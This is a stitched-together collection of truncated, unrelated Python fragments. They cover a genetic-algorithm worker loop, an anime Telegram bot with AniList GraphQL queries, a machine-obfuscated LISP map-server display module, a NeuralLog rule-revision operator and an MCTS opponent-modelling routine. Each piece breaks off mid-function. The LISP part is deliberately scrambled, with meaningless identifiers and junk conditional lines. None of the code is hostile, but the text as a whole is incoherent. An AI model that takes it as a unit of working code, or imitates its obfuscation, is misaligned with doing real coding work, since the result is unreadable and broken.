if inDict is None:
# If None is returned, we're all done here.
modelQueue.task_done()
break
uid = inDict['individual'].uid
log.debug('Pulled individual {} from model queue.'.format(uid))
# Write, run, update, and evaluate the individual.
inDict['individual'].writeRunUpdateEval(
strModel=inDict['strModel'],
inPath=inDict['inPath'],
outDir=inDict['outDir'],
costs=costs)
# Denote task as complete.
modelQueue.task_done()
log.debug(('Completed running individual {}. There are {} '
+ 'individuals left in the model '
+ 'queue.').format(uid, modelQueue.qsize()))
except:
print('Exception occurred!', flush=True)
error_type, error, traceback = sys.exc_info()
print(error_type, flush=True)
print(error, flush=True)
print(traceback, flush=True)
def mutateChroms(c, prob):
"""Take a chromosome and randomly mutate it.
INPUTS:
c: list of chromsomes, which are tuples of 1's and 0's. Ex:
(1, 0, 0, 1, 0)
prob: decimal in set [0.0, 1.0] to determine chance of
mutating (bit-flipping) an individual gene
"""
out = []
for chrom in c:
newC = list(chrom)
# count = 0
for ind in range(len(c)):
if random.random() < prob:
# Flip the bit!
newC[ind] = 1 - newC[ind]
# count += 1
# Convert to tuple, put in output list
out.append(tuple(newC))
return out
def crossChrom(chrom1, chrom2):
"""Take two chromosomes and create two new ones.
INPUTS:
chrom1: tuple of 1's and 0's, same | |
import requests
import time
from bs4 import BeautifulSoup
from .helper import cflag, make_it_rw, pos_no, return_json_senpai, day_, season_
from .. import BOT_NAME
from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup
from jikanpy import AioJikan
from datetime import datetime
ANIME_DB, MANGA_DB, CHAR_DB = {}, {}, {}
#### Anilist part ####
ANIME_TEMPLATE = """{name}
**ID | MAL ID:** `{idm}` | `{idmal}`
➤ **SOURCE:** `{source}`
➤ **TYPE:** `{formats}`{dura}{gnrs_}
{status_air}{user_data}
➤ **ADULT RATED:** `{adult}`
🎬 {trailer_link}
📖 <a href="{surl}">Synopsis</a>
📖 <a href="{url}">Official Site</a>
{additional}"""
# GraphQL Queries.
ANIME_QUERY = """
query ($id: Int, $idMal:Int, $search: String) {
Media (id: $id, idMal: $idMal, search: $search, type: ANIME) {
id
idMal
title {
romaji
english
native
}
format
status
episodes
duration
countryOfOrigin
source (version: 2)
trailer {
id
site
}
genres
relations {
edges {
node {
title {
romaji
english
}
id
}
relationType
}
}
nextAiringEpisode {
timeUntilAiring
episode
}
isAdult
isFavourite
mediaListEntry {
status
score
id
}
siteUrl
}
}
"""
ISADULT = """
query ($id: Int) {
Media (id: $id) {
isAdult
}
}
"""
BROWSE_QUERY = """
query ($s: MediaSeason, $y: Int, $sort: [MediaSort]) {
Page {
media (season: $s, seasonYear: $y, sort: $sort) {
title {
romaji
}
format
}
}
}
"""
FAV_ANI_QUERY = """
query ($id: Int, $page: Int) {
User (id: $id) {
favourites {
anime (page: $page, perPage: 10) {
pageInfo {
lastPage
}
edges {
node {
title {
romaji
}
siteUrl
}
}
}
}
}
}
"""
FAV_MANGA_QUERY = """
query ($id: Int, $page: Int) {
User (id: $id) {
favourites {
manga (page: $page, perPage: 10) {
pageInfo {
lastPage
}
edges {
node {
title {
romaji
}
siteUrl
}
}
}
}
}
}
"""
FAV_CHAR_QUERY = """
query ($id: Int, $page: Int) {
User (id: $id) {
favourites {
characters (page: $page, perPage: 10) {
pageInfo {
lastPage
}
edges {
node {
name {
full
}
siteUrl
}
}
}
}
}
}
"""
VIEWER_QRY = """
query {
Viewer{
id
name
siteUrl
statistics {
anime {
count
minutesWatched
episodesWatched
meanScore
}
manga {
count
chaptersRead
volumesRead
meanScore
}
}
}
}
"""
USER_QRY = """
query ($search: String) {
User (name: $search) {
id
name
siteUrl
statistics {
anime {
count
minutesWatched
episodesWatched
meanScore
}
manga {
count
chaptersRead
volumesRead
meanScore
}
}
}
}
"""
ANIME_MUTATION = """
mutation ($id: Int) {
ToggleFavourite (animeId: $id) {
anime {
pageInfo {
total
}
}
}
}"""
MANGA_MUTATION = """
mutation ($id: Int) {
ToggleFavourite (mangaId: $id) {
manga {
pageInfo {
total
}
}
}
}"""
CHAR_MUTATION = """
mutation ($id: Int) {
ToggleFavourite (characterId: $id) {
characters {
pageInfo {
total
}
}
}
}"""
ANILIST_MUTATION = """
mutation ($id: Int, $status: MediaListStatus) {
SaveMediaListEntry (mediaId: $id, status: $status) {
media {
title {
romaji
}
}
}
}"""
ANILIST_MUTATION_UP = """
mutation ($id: [Int], $status: MediaListStatus) {
UpdateMediaListEntries (ids: $id, status: $status) {
media {
title {
romaji
}
}
}
}"""
ANILIST_MUTATION_DEL = """
mutation ($id: Int) {
DeleteMediaListEntry (id: $id) {
deleted
}
}"""
AIR_QUERY = """
query ($id: Int, $idMal:Int, $search: String) {
Media (id: $id, idMal: $idMal, search: $search, type: ANIME) {
id
title {
romaji
english
}
status
countryOfOrigin
nextAiringEpisode {
timeUntilAiring
episode
}
siteUrl
isFavourite
mediaListEntry {
status
id
}
}
}
"""
DES_INFO_QUERY = """
query ($id: Int) {
Media (id: $id) {
id
description (asHtml: false)
}
}
"""
CHA_INFO_QUERY = """
query ($id: Int, $page: Int) {
Media (id: $id, type: ANIME) {
id
characters (page: $page, perPage: 25, sort: ROLE) {
pageInfo {
lastPage
total
}
edges {
node {
name {
full
}
}
role
}
}
}
}
"""
REL_INFO_QUERY = """
query ($id: Int) {
Media (id: $id, type: ANIME) {
id
relations {
edges {
node {
title {
romaji
}
}
relationType
}
}
}
}
"""
PAGE_QUERY = """
query ($search: String, $page: Int) {
Page (perPage: 1, page: $page) {
pageInfo {
total
}
media (search: $search, type: ANIME) {
id
idMal
title {
romaji
english
native
}
format
status
episodes
duration
countryOfOrigin
source (version: 2)
trailer {
id
site
}
genres
relations {
edges {
node {
title {
romaji
english
}
}
relationType
}
}
nextAiringEpisode {
timeUntilAiring
episode
}
isAdult
isFavourite
mediaListEntry {
status
score
id
}
siteUrl
}
}
}
"""
CHARACTER_QUERY = """
query ($id: Int, $search: String, $page: Int) {
Page (perPage: 1, page: $page) {
pageInfo{
total
}
characters (id: $id, search: $search) {
id
name {
full
native
}
image {
large
}
isFavourite
siteUrl
}
}
}
"""
MANGA_QUERY = """
query ($search: String, $page: Int) {
Page (perPage: 1, page: $page) {
pageInfo {
total
}
media (search: $search, type: MANGA) {
id
title {
romaji
english
native
}
format
countryOfOrigin
source (version: 2)
status
description(asHtml: true)
chapters
isFavourite
mediaListEntry {
status
score
id
}
volumes
averageScore
siteUrl
isAdult
}
}
}
"""
DESC_INFO_QUERY = """
query ($id: Int) {
Character (id: $id) {
image {
large
}
description(asHtml: false)
}
}
"""
LS_INFO_QUERY = """
query ($id: Int) {
Character (id: $id) {
image {
large
}
media (page: 1, perPage: 25) {
nodes {
title {
romaji
english
}
type
}
}
}
}
"""
ACTIVITY_QUERY = """
query ($id: Int) {
Page (perPage: 12) {
activities (userId: $id, type: MEDIA_LIST, sort: ID_DESC) {
...kek
}
}
}
fragment kek on ListActivity {
type
media {
title {
romaji
}
siteUrl
}
progress
status
}
"""
TOP_QUERY = """
query ($gnr: String, $page: Int) {
Page (perPage: 15, page: $page) {
pageInfo {
lastPage
total
}
media (genre: $gnr, sort: SCORE_DESC, type: ANIME) {
title {
romaji
}
}
}
}
"""
TOPT_QUERY = """
query ($gnr: String, $page: Int) {
Page (perPage: 15, page: $page) {
pageInfo {
lastPage
total
}
media (tag: $gnr, sort: SCORE_DESC, type: ANIME) {
title {
romaji
}
}
}
}
"""
ALLTOP_QUERY = """
query ($page: Int) {
Page (perPage: 15, page: $page) {
pageInfo {
lastPage
total
}
media (sort: SCORE_DESC, type: ANIME) {
title {
romaji
}
}
}
}
"""
GET_GENRES = """
query {
GenreCollection
}
"""
GET_TAGS = """
query{
MediaTagCollection {
name
isAdult
}
}
"""
async def get_all_tags(text: str = None):
vars_ = {}
result = await return_json_senpai(GET_TAGS, vars_, auth=False, user=None)
msg = "**Tags List:**\n\n`"
kek = []
for i in result['data']['MediaTagCollection']:
if text is not None and 'nsfw' in text:
if str(i['isAdult'])!='False':
kek.append(i['name'])
else:
if str(i['isAdult'])=='False':
kek.append(i['name'])
msg += ", ".join(kek)
msg += "`"
return msg
async def get_all_genres():
vars_ = {}
result = await return_json_senpai(GET_GENRES, vars_, auth=False)
msg = "**Genres List:**\n\n"
for i in result['data']['GenreCollection']:
msg += f"`{i}`\n"
return msg
async def get_user_activity(id_, user):
vars_ = {"id": id_}
result = await return_json_senpai(ACTIVITY_QUERY, vars_, auth=True, user=user)
data = result["data"]["Page"]["activities"]
msg = ""
for i in data:
try:
name = f"[{i['media']['title']['romaji']}]({i['media']['siteUrl']})"
if i['status'] in ["watched episode", "read chapter"]:
msg += f"⚬ {str(i['status']).capitalize()} {i['progress']} of {name}\n"
else:
msg += f"⚬ {str(i['status']).capitalize()} {name}\n"
except KeyError:
pass
btn = [[InlineKeyboardButton("Back", callback_data=f"getusrbc_{user}")]]
return f"https://img.anili.st/user/{id_}?a={time.time()}", msg, InlineKeyboardMarkup(btn)
async def get_top_animes(gnr: str, page, user):
vars_ = {"gnr": gnr.lower(), "page": int(page)}
query = TOP_QUERY
msg = f"Top animes for genre `{gnr.capitalize()}`:\n\n"
if gnr=="None":
query = ALLTOP_QUERY
vars_ = {"page": int(page)}
msg = f"Top animes:\n\n"
nsfw = False
result = await return_json_senpai(query, vars_, auth=False, user=user)
if len(result['data']['Page']['media'])==0:
query = TOPT_QUERY
msg = f"Top animes for tag `{gnr.capitalize()}`:\n\n"
result = await return_json_senpai(query, vars_, auth=False, user=user)
if len(result['data']['Page']['media'])==0:
return [f"No results Found"]
nsls = await get_all_tags('nsfw')
nsfw = True if gnr.lower() in nsls.lower() else False
data = result["data"]["Page"]
for i in data['media']:
msg += f"⚬ `{i['title']['romaji']}`\n"
msg += f"\nTotal available animes: `{data['pageInfo']['total']}`"
btn = []
if int(page)==1:
if int(data['pageInfo']['lastPage'])!=1:
btn.append([InlineKeyboardButton("Next", callback_data=f"topanimu_{gnr}_{int(page)+1}_{user}")])
elif int(page) == int(data['pageInfo']['lastPage']):
btn.append([InlineKeyboardButton("Prev", callback_data=f"topanimu_{gnr}_{int(page)-1}_{user}")])
else:
btn.append([
InlineKeyboardButton("Prev", callback_data=f"topanimu_{gnr}_{int(page)-1}_{user}"),
InlineKeyboardButton("Next", callback_data=f"topanimu_{gnr}_{int(page)+1}_{user}")
])
return [msg, nsfw], InlineKeyboardMarkup(btn) if len(btn)!=0 else ""
async def get_user_favourites(id_, user, req, page, sighs):
vars_ = {"id": int(id_), "page": int(page)}
result = await return_json_senpai(
FAV_ANI_QUERY if req=="ANIME" else FAV_CHAR_QUERY if req=="CHAR" else FAV_MANGA_QUERY,
vars_,
auth=True,
user=int(user)
)
data = result["data"]["User"]["favourites"]["anime" if req=="ANIME" else "characters" if req=="CHAR" else "manga"]
msg = "Favourite Animes:\n\n" if req=="ANIME" else "Favourite Characters:\n\n" if req=="CHAR" else "Favourite Manga:\n\n"
for i in data["edges"]:
msg += f"⚬ [{i['node']['title']['romaji'] if req!='CHAR' else i['node']['name']['full']}]({i['node']['siteUrl']})\n"
btn = []
if int(page)==1:
if int(data['pageInfo']['lastPage'])!=1:
btn.append([InlineKeyboardButton("Next", callback_data=f"myfavqry_{req}_{id_}_{str(int(page)+1)}_{sighs}_{user}")])
elif int(page) == int(data['pageInfo']['lastPage']):
btn.append([InlineKeyboardButton("Prev", callback_data=f"myfavqry_{req}_{id_}_{str(int(page)-1)}_{sighs}_{user}")])
else:
btn.append([
InlineKeyboardButton("Prev", callback_data=f"myfavqry_{req}_{id_}_{str(int(page)-1)}_{sighs}_{user}"),
InlineKeyboardButton("Next", callback_data=f"myfavqry_{req}_{id_}_{str(int(page)+1)}_{sighs}_{user}")
])
btn.append([InlineKeyboardButton("Back", callback_data=f"myfavs_{id_}_{sighs}_{user}")])
return f"https://img.anili.st/user/{id_}?a=({time.time()})", msg, InlineKeyboardMarkup(btn)
async def get_featured_in_lists(idm, req, auth: bool = False, user: int = None, page: int = 0):
vars_ = {"id": int(idm)}
| |
OooO0OO . geo ) :
oOoOoOoo0 = lisp . lisp_print_cour ( OooO0OO . geo . print_geo_url ( ) )
i1I1i111Ii += "{}geo: {}<br>" . format ( o00o , oOoOoOoo0 )
if 74 - 74: O0 / i1IIi
if ( OooO0OO . elp ) :
iIi1i1iIi1iI = lisp . lisp_print_cour ( OooO0OO . elp . print_elp ( False ) )
i1I1i111Ii += "{}elp: {}<br>" . format ( o00o , iIi1i1iIi1iI )
if 78 - 78: OoooooooOO . OoO0O00 + ooOoO0o - i1IIi
if ( OooO0OO . rle ) :
IiIii1i111 = lisp . lisp_print_cour ( OooO0OO . rle . print_rle ( True , True ) )
i1I1i111Ii += "{}rle: {}<br>" . format ( o00o , IiIii1i111 )
if 31 - 31: OoooooooOO . OOooOOo
if ( OooO0OO . json ) :
Ii1 = lisp . lisp_print_cour ( OooO0OO . json . print_json ( True ) )
i1I1i111Ii += "{}json: {}<br>" . format ( o00o , Ii1 )
if 83 - 83: iII111i . O0 / Oo0Ooo / OOooOOo - II111iiii
if 100 - 100: OoO0O00
i1I1i111Ii += "<br>"
if 46 - 46: OoOoOO00 / iIii1I11I1II1 % iII111i . iIii1I11I1II1 * iII111i
i1I1i111Ii += "</font>"
return ( i1I1i111Ii )
if 38 - 38: I1ii11iIi11i - iII111i / O0 . I1Ii111
if 45 - 45: I1Ii111
if 83 - 83: OoOoOO00 . OoooooooOO
if 58 - 58: i11iIiiIii + OoooooooOO % OoooooooOO / IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if 7 - 7: OoooooooOO . IiII
if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
def Oooo00 ( ddt_entry , output ) :
I111iIi1 = ddt_entry . print_eid_tuple ( )
oo00O00oO000o = ddt_entry . map_referrals_sent
if 71 - 71: I1ii11iIi11i - ooOoO0o / OoOoOO00 * OoOoOO00 / i1IIi . i1IIi
if ( ddt_entry . is_auth_prefix ( ) ) :
output += lispconfig . lisp_table_row ( I111iIi1 , "--" , "auth-prefix" , "--" ,
oo00O00oO000o )
return ( [ True , output ] )
if 53 - 53: I1Ii111
if 21 - 21: I11i
for OoO00 in ddt_entry . delegation_set :
I1I11I1I1I = OoO00 . delegate_address
OO0Ooooo000Oo = str ( OoO00 . priority ) + "/" + str ( OoO00 . weight )
output += lispconfig . lisp_table_row ( I111iIi1 , I1I11I1I1I . print_address ( ) ,
OoO00 . print_node_type ( ) , OO0Ooooo000Oo , oo00O00oO000o )
if ( I111iIi1 != "" ) :
I111iIi1 = ""
oo00O00oO000o = ""
if 97 - 97: Ii1I * I1ii11iIi11i / I1IiiI / iIii1I11I1II1 % I11i
if 95 - 95: ooOoO0o + i11iIiiIii * I1Ii111 - i1IIi * I1Ii111 - iIii1I11I1II1
return ( [ True , output ] )
if 75 - 75: OoooooooOO * IiII
if 9 - 9: IiII - II111iiii + O0 / iIii1I11I1II1 / i11iIiiIii
if 39 - 39: IiII * Oo0Ooo + iIii1I11I1II1 - IiII + OOooOOo
if 69 - 69: O0
if 85 - 85: ooOoO0o / O0
if 18 - 18: o0oOOo0O0Ooo % O0 * I1ii11iIi11i
if 62 - 62: I1Ii111 . IiII . OoooooooOO
if 11 - 11: OOooOOo / I11i
def oooO0 ( ddt_entry , output ) :
if 16 - 16: II111iiii + oO0o - OoooooooOO
if 3 - 3: O0 / iII111i
if 31 - 31: OOooOOo + o0oOOo0O0Ooo . OoooooooOO
if 89 - 89: II111iiii + i1IIi + II111iiii
if ( ddt_entry . group . is_null ( ) ) :
return ( Oooo00 ( ddt_entry , output ) )
if 7 - 7: O0 % o0oOOo0O0Ooo + I1ii11iIi11i * iII111i - iII111i
if 42 - 42: OoOoOO00 * OoOoOO00 * I1Ii111 . I11i
if ( ddt_entry . source_cache == None ) : return ( [ True , output ] )
if 51 - 51: OOooOOo % iIii1I11I1II1 - OoooooooOO % ooOoO0o * iIii1I11I1II1 % OoO0O00
if 99 - 99: oO0o * II111iiii * I1Ii111
if 92 - 92: Oo0Ooo
if 40 - 40: OoOoOO00 / IiII
if 79 - 79: OoO0O00 - iIii1I11I1II1 + Ii1I - I1Ii111
output = ddt_entry . source_cache . walk_cache ( Oooo00 ,
output )
return ( [ True , output ] )
if 93 - 93: II111iiii . I1IiiI - Oo0Ooo + OoOoOO00
if 61 - 61: II111iiii
if 15 - 15: i11iIiiIii % I1IiiI * I11i / I1Ii111
if 90 - 90: iII111i
if 31 - 31: OOooOOo + O0
if 87 - 87: ooOoO0o
if 45 - 45: OoO0O00 / OoooooooOO - iII111i / Ii1I % IiII
if 83 - 83: I1IiiI . iIii1I11I1II1 - IiII * i11iIiiIii
def IiI11i1IIiiI ( ) :
oOOo000oOoO0 = "{} entries configured" . format ( lisp . lisp_ddt_cache . cache_size ( ) )
OoOo00o0OO = lisp . lisp_span ( "LISP-MS Configured Map-Server Peers & " + "Authoritative Prefixes:" , oOOo000oOoO0 )
if 1 - 1: I1IiiI % ooOoO0o
i1I1i111Ii = lispconfig . lisp_table_header ( OoOo00o0OO , "EID-Prefix or (S,G)" ,
"Peer Address" , "Delegation Type" , "Priority/Weight" ,
"Map-Referrals Sent" )
if 65 - 65: I1IiiI + OoOoOO00 / OOooOOo
i1I1i111Ii = lisp . lisp_ddt_cache . walk_cache ( oooO0 , i1I1i111Ii )
i1I1i111Ii += lispconfig . lisp_table_footer ( )
return ( i1I1i111Ii )
if 83 - 83: o0oOOo0O0Ooo . iII111i - Oo0Ooo
if 65 - 65: iIii1I11I1II1 / ooOoO0o . IiII - II111iiii
if 72 - 72: iIii1I11I1II1 / IiII % iII111i % OOooOOo - I11i % OOooOOo
if 100 - 100: Oo0Ooo + i11iIiiIii
if 71 - 71: I11i / o0oOOo0O0Ooo / I1Ii111 % OOooOOo
if 51 - 51: IiII * O0 / II111iiii . Ii1I % OOooOOo / I1IiiI
if 9 - 9: I1IiiI % I1IiiI % II111iiii
if 30 - 30: IiII + I1Ii111 - IiII . IiII - II111iiii + O0
def oOO0 ( input_str ) :
IIiiIiI1 , i1IIiIii1i , iiI11ii1I1 , ooOOO0OooOo = lispconfig . lisp_get_lookup_string ( input_str )
if 33 - 33: OOooOOo / i1IIi - I1IiiI % Oo0Ooo . I1ii11iIi11i
if 17 - 17: II111iiii / I1ii11iIi11i % IiII + I1IiiI * I1Ii111
i1I1i111Ii = "<br>"
if 36 - 36: I1Ii111 * OoO0O00
if 23 - 23: I11i . OoooooooOO - OOooOOo + IiII . II111iiii
if 54 - 54: ooOoO0o
if 67 - 67: OOooOOo . Oo0Ooo + OoOoOO00 - OoooooooOO
iiIiIIi = lisp . lisp_site_eid_lookup ( IIiiIiI1 , iiI11ii1I1 , i1IIiIii1i )
if ( iiIiIIi and iiIiIIi . is_star_g ( ) == False ) :
oOo0OOoO0 = iiIiIIi . print_eid_tuple ( )
OOOoO = lisp . green ( "registered" , True ) if iiIiIIi . registered else lisp . red ( "not registered" , True )
if 14 - 14: I11i . iIii1I11I1II1 . OoooooooOO . II111iiii / o0oOOo0O0Ooo
i1I1i111Ii += "{} '{}' {} {} {} {} {} {}" . format ( lisp . lisp_print_sans ( "Site" ) ,
# II111iiii % i11iIiiIii
lisp . lisp_print_cour ( iiIiIIi . site . site_name ) ,
lisp . lisp_print_sans ( "entry" ) ,
lisp . lisp_print_cour ( oOo0OOoO0 ) ,
lisp . lisp_print_sans ( "found for EID" ) ,
lisp . lisp_print_cour ( input_str ) ,
lisp . lisp_print_sans ( "site EID is" ) ,
lisp . lisp_print_cour ( OOOoO ) )
return ( i1I1i111Ii + "<br>" )
if 50 - 50: I1IiiI * i11iIiiIii
if 68 - 68: OOooOOo * O0 . I11i - II111iiii . ooOoO0o / II111iiii
if 47 - 47: OoooooooOO
if 4 - 4: I1IiiI % I11i
if 10 - 10: IiII . OoooooooOO - OoO0O00 + IiII - O0
o0oO00 , O0o , O0O0Oo00 = lisp . lisp_ms_compute_neg_prefix ( IIiiIiI1 , iiI11ii1I1 )
if 95 - 95: OoO0O00
if ( iiI11ii1I1 . is_null ( ) ) :
o0oO00 = lisp . lisp_print_cour ( o0oO00 . print_prefix ( ) )
else :
O0o = lisp . lisp_print_cour ( O0o . print_prefix ( ) )
o0oO00 = lisp | |
self.clause_modifiers = []
elif not isinstance(self.clause_modifiers, Collection):
self.clause_modifiers = [self.clause_modifiers]
for clause_modifier in self.clause_modifiers:
if not hasattr(clause_modifier, "learning_system") or \
clause_modifier.learning_system is None:
clause_modifier.learning_system = self.learning_system
clause_modifier.initialize()
self.theory_metric.initialize()
# noinspection PyMissingOrEmptyDocstring
@property
def theory_evaluator(self) -> TheoryEvaluator:
return self.learning_system.theory_evaluator
# noinspection PyMissingOrEmptyDocstring
def required_fields(self):
return ["learning_system", "theory_metric"]
@abstractmethod
def perform_operation(self, targets, minimum_threshold=None):
"""
Applies the operation on the theory, given the target examples.
:param targets: the target examples
:type targets: Examples
:param minimum_threshold: a minimum threshold to consider by the
operator. Implementations of this class could use this threshold in
order to improve performance by skipping evaluating candidates
:type minimum_threshold: Optional[float]
:return: the revised theory
:rtype: NeuralLogProgram or None
"""
pass
def theory_revision_accepted(self, revised_theory, examples):
"""
Method to send a feedback to the revision operator, telling
that the
revision was accepted.
:param revised_theory: the revised theory
:type revised_theory: NeuralLogProgram
:param examples: the examples used on the revision
:type examples: Examples
"""
pass
def apply_clause_modifiers(self, horn_clause, targets):
"""
Applies the clause modifiers to the `horn_clause`, given the target
examples.
:param horn_clause: the Horn clause
:type horn_clause: HornClause
:param targets: the target examples
:type targets: Examples
:return: the modified Horn clause
:rtype: HornClause
"""
for clause_modifier in self.clause_modifiers:
horn_clause = clause_modifier.modify_clause(horn_clause, targets)
return horn_clause
def check_for_equivalent_clause(self, clause, theory):
"""
Checks if the theory has another clause equivalent to `clause`.
Since full equivalent checking is not trivial, we will consider that
two clauses are equivalent whenever they are equal, expect by
constant terms in learnable predicates.
:param clause: the clause
:type clause: HornClause
:param theory: the current theory
:type theory: NeuralLogProgram
:return: `True`, if it does; otherwise, `False`
:rtype: bool
"""
trainable_predicates = set()
base = self.learning_system.knowledge_base
theory = self.learning_system.theory if theory is None else theory
trainable_predicates.update(
base.trainable_predicates,
theory.trainable_predicates)
other_clauses = \
base.clauses_by_predicate.get(clause.head.predicate, [])
for other_clause in other_clauses:
if self._is_clauses_equivalent(
clause, other_clause, trainable_predicates):
return True
other_clauses = \
theory.clauses_by_predicate.get(clause.head.predicate, [])
for other_clause in other_clauses:
if self._is_clauses_equivalent(
clause, other_clause, trainable_predicates):
return True
return False
# noinspection PyMethodMayBeStatic
def _is_clauses_equivalent(self, clause1, clause2, trainable_predicates):
"""
Checks if the clauses are equivalent to each other.
:param clause1: the first clause
:type clause1: HornClause
:param clause2: the second clause
:type clause2: HornClause
:param trainable_predicates: the set of trainable predicates
:type trainable_predicates: Set[Predicate]
:return: `True`, if they are equivalent to each other;
otherwise, `False`
:rtype: bool
"""
if clause1.head != clause2.head:
return False
if len(clause1.body) != len(clause2.body):
return False
for atom1, atom2 in zip(clause1.body, clause2.body):
predicate = atom1.predicate
if predicate != atom2.predicate:
return False
if not self._is_predicate_trainable(
predicate, trainable_predicates):
if atom1.terms != atom2.terms:
return False
return True
@staticmethod
def _is_predicate_trainable(predicate, trainable_predicates):
"""
Checks if the predicate is equivalent to a trainable predicate.
:param predicate: the predicate
:type predicate: Predicate
:param trainable_predicates: the trainable predicates
:type trainable_predicates: Iterable[Predicate]
:return: `True`, if it is; otherwise, `False`
:rtype: bool
"""
for trainable in trainable_predicates:
if predicate.equivalent(trainable):
return True
return False
def __repr__(self):
return self.__class__.__name__
class BottomClauseBoundedRule(RevisionOperator):
"""
Operator that implements Guimarães and Paes rule creation algorithm.
<NAME> and <NAME>, Looking at the Bottom and the Top: A Hybrid
Logical Relational Learning System Based on Answer Sets, 2015 Brazilian
Conference on Intelligent Systems (BRACIS), Natal, 2015, pp. 240-245.
"""
OPTIONAL_FIELDS = dict(RevisionOperator.OPTIONAL_FIELDS)
OPTIONAL_FIELDS.update({
"variable_generator": None,
"relevant_depth": 0,
"refine": False,
"maximum_side_way_movements": 0,
"improvement_threshold": 0.0,
"generic": True,
"evaluation_timeout": 300,
"number_of_process": 1,
"infer_relevant": False
})
def __init__(self,
learning_system=None,
theory_metric=None,
clause_modifiers=None,
variable_generator=None,
relevant_depth=None,
refine=None,
maximum_side_way_movements=None,
improvement_threshold=None,
generic=None,
evaluation_timeout=None,
number_of_process=None,
infer_relevant=None):
"""
Creates a Bottom Clause Bounded Rule operator.
:param learning_system: the learning system
:type learning_system: sls.StructureLearningSystem
:param theory_metric: the theory metric
:type theory_metric: TheoryMetric
:param clause_modifiers: a clause modifier, a list of clause modifiers
or none
:type clause_modifiers: ClauseModifier or Collection[ClauseModifier]
or None
:param variable_generator: the variable generator
:type variable_generator: Optional[VariableGenerator]
:param relevant_depth: the relevant depth
:type relevant_depth: Optional[int]
:param refine: if it is to refine the rules
:type refine: Optional[bool]
:param maximum_side_way_movements: the maximum side way movements
:type maximum_side_way_movements: Optional[int]
:param improvement_threshold: the improvement threshold
:type improvement_threshold: Optional[float]
:param generic: if it is to return the most generic rule
:type generic: Optional[bool]
:param evaluation_timeout: the evaluation timeout, in seconds
:type evaluation_timeout: Optional[int]
:param number_of_process: the number of parallel process
:type number_of_process: Optional[int]
:param infer_relevant: If `True`, in addition to facts in the knowledge
base, it also considers as relevant the facts that could be inferred
by the rules
:type infer_relevant: Optional[bool]
"""
super().__init__(learning_system, theory_metric, clause_modifiers)
self.variable_generator = variable_generator
"The variable name generator."
self.relevant_depth = relevant_depth
"""
The maximum depth on the transitivity of the relevant concept.
An atom is relevant to the example if it shares (or transitively shares)
a term with the example.
If `relevant_depth` is `0`, it means that only the atoms which
actually share a term with the example will be considered,
these atoms are classed atoms at depth `0`.
If it is `1`, it means that the atoms which share a term with the atoms
at depth `0` will also be considered.
If it is `n`, for `n > 0`, it means that the atoms which share a term
with the atoms at depth `n - 1` will also be considered.
If it is negative, atoms at any depth will be considered.
"""
if relevant_depth is None:
self.relevant_depth = self.OPTIONAL_FIELDS["relevant_depth"]
self.refine = refine
"""
It specifies if the rule must be reined by adding literals to it,
in order to try to improve the rule.
"""
if refine is None:
self.refine = self.OPTIONAL_FIELDS["refine"]
self.maximum_side_way_movements = maximum_side_way_movements
"""
The maximum side way movements, this is, the maximum number of
refining steps will be made, without improving the performance.
If a metric improves by adding a literal to its body, it does not
count as a side way movement and the number of side way steps at the
moment becomes zero.
If it is negative, there will be no maximum side way movements,
wall possible literals will be tried, since it does not degrade the
rule.
"""
if maximum_side_way_movements is None:
self.maximum_side_way_movements = \
self.OPTIONAL_FIELDS["maximum_side_way_movements"]
self.improvement_threshold = improvement_threshold
"""
The minimal necessary improvements, over the current clause evaluation
and a new candidate, to be considered as improvement. If the threshold
is not met, it is considered a side way movement.
Use a threshold of `0.0` and a negative `maximum_side_way_movements`
to allow the search to test all possible rules.
Use a threshold of `e` and a `maximum_side_way_movements` of `0` to
stop as soon as a rule does not improve more than `e`.
"""
if improvement_threshold is None:
self.improvement_threshold = \
self.OPTIONAL_FIELDS["improvement_threshold"]
self.generic = generic
"""
Flag to specify which rule will be returned in case of a tie in the
evaluation of the best rules.
If `generic` is `True`, the most generic tied rule will be returned,
this is, the rule whose body has the fewest number of literals in it.
if `generic` is `False`, the most specific rule will be returned,
instead, this is, the rule whose body has the most number of literals
in it.
"""
if generic is None:
self.generic = self.OPTIONAL_FIELDS["generic"]
self.evaluation_timeout = evaluation_timeout
"""
The maximum amount of time, in seconds, allowed to the evaluation of
a rule.
By default, it is 300 seconds, or 5 minutes.
"""
if evaluation_timeout is None:
self.evaluation_timeout = self.OPTIONAL_FIELDS["evaluation_timeout"]
self.number_of_process = number_of_process
"""
The maximum number of process this class is allowed to create in order
to concurrently evaluate different rules.
The default is `1`.
"""
if number_of_process is None:
self.number_of_process = self.OPTIONAL_FIELDS["number_of_process"]
self.infer_relevant = infer_relevant
"""
If `True`, in addition to facts in the knowledge base, it also
considers as relevant the facts that could be inferred by the rules.
"""
if self.infer_relevant is None:
self.infer_relevant = self.OPTIONAL_FIELDS["infer_relevant"]
# | |
if len(extra_info) == 1: # If dictionary only contains info about this agent
# First argument to `torch.full` might create an issue (might break for non 1D actions)
processed_opponent_policy = torch.full((self.action_dim,), float('nan'))
# Adding batch dimension
processed_opponent_obs = torch.full(self.observation_dim, float('nan'))
processed_opponent_obs = self.state_preprocess_fn(processed_opponent_obs)
else:
opponent_index = list(filter(lambda key: key != 'self',
extra_info.keys()))[0] # Not super pretty
opponent_policy = extra_info[opponent_index][self.extra_info_key]
processed_opponent_obs = self.state_preprocess_fn(extra_info[opponent_index]['s'])
if self.extra_info_key == 'a': # Observing only single actions
processed_opponent_policy = nn.functional.one_hot(torch.LongTensor([opponent_policy]), num_classes=self.action_dim).squeeze(0)
elif self.extra_info_key == 'probs': # Observing full action distribution
processed_opponent_policy = torch.FloatTensor(opponent_policy)
else: raise RuntimeError(f'Could not process extra_info_key: {self.extra_info_key}')
return processed_opponent_policy, processed_opponent_obs
def update_storage(self, storage: Storage,
o: torch.Tensor,
r: torch.Tensor,
done: bool,
opponent_policy: torch.Tensor,
opponent_s: torch.Tensor,
mcts_policy: torch.Tensor,
expert_state_value_prediction: torch.Tensor):
storage.add({'normalized_child_visitations': mcts_policy,
's': o})
if self.use_agent_modelling:
storage.add({'opponent_policy': opponent_policy,
'opponent_s': opponent_s})
if self.average_episode_returns_with_mcts_values:
storage.add({'V': expert_state_value_prediction})
if done:
# Hendrik idea:
# Using MCTS value for current search might be better?
if self.average_episode_returns_with_mcts_values:
# Average all previously estimated values with episode return
storage.V = [(value + r) / 2 for value in storage.V]
else:
